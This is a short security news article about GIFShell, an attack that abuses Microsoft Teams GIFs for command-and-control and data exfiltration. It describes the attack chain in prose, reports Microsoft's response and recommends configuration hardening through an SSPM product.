Read Time:2 Minute, 18 Second
A newly published attack method is occurring in Microsoft Teams—a perfect scenario implicating how incorrectly done configurations and legitimate features can pave the way for threat actors.
Developed by Bobby Rauch, the GIFShell attack strategy targets security-compromised devices or users. Malicious actors take advantage of several Microsoft Teams functionalities to serve as a command and control (C&C) for malware and exfiltrate data via GIFs without being seen by EDR and other network monitoring tools.
There are different steps involved in this process. First, the attacker uses a method similar to phishing. They should primarily convince the user to install a malicious stager. It runs commands and sends command output to a Microsoft Teams webhook using a GIF URL.
“I realised that while compelling, the attack chain relies on a dropper being downloaded and run on a victim’s machine,” Rauch said.
The threat actor contacts other Microsoft Teams users outside the enterprise after setting up their own Microsoft Teams tenant; then, the actor sends a message containing a specially created GIF to a Microsoft Teams user using a GIFShell Python script. They altered the GIF file to add instructions to run on the target’s computer.
The program will record the message and the GIF in Microsoft Team’s logs after the target receives them. The user doesn’t have to open the GIF for the attacker’s commands to take effect.
The stager keeps an eye on the Teams logs and extracts and executes the commands when it discovers a GIF. To get the GIF named using the base64-encoded result of the executed command, Microsoft’s servers will make a connection back to the attacker’s server URL. This request will be received by the GIFShell server operating on the attacker’s server. It will then automatically decode the data and allow the attackers to view the results of the command run on the victim’s device.
Lawrence Abrams, a member of BleepingComputer, said that Microsoft acknowledges this attack method. However, they do not plan to execute proactive security solutions since they do not find any bypassed security boundaries.
They said, “It does not meet the bar for an urgent security fix…may take action in a future release to help mitigate this technique.”
Therefore, the configuration should be done on the user’s end to avoid inbound attacks.
Misconfigurations can be prevented, and security settings can be strengthened using manual detection and remediation or an automated SaaS Security Posture Management (SSPM) service. Due to the vast number of configurations, users, devices, and new threats, the manual approach is an unsustainable resource drain that overwhelms security teams. However, security teams may completely control their SaaS apps and customizations thanks to an SSPM solution like Adaptive Shield.
Happy
0 %
Sad
0 %
Excited
0 %
Sleepy
0 %
Angry
0 %
Surprise
0 %
0
0
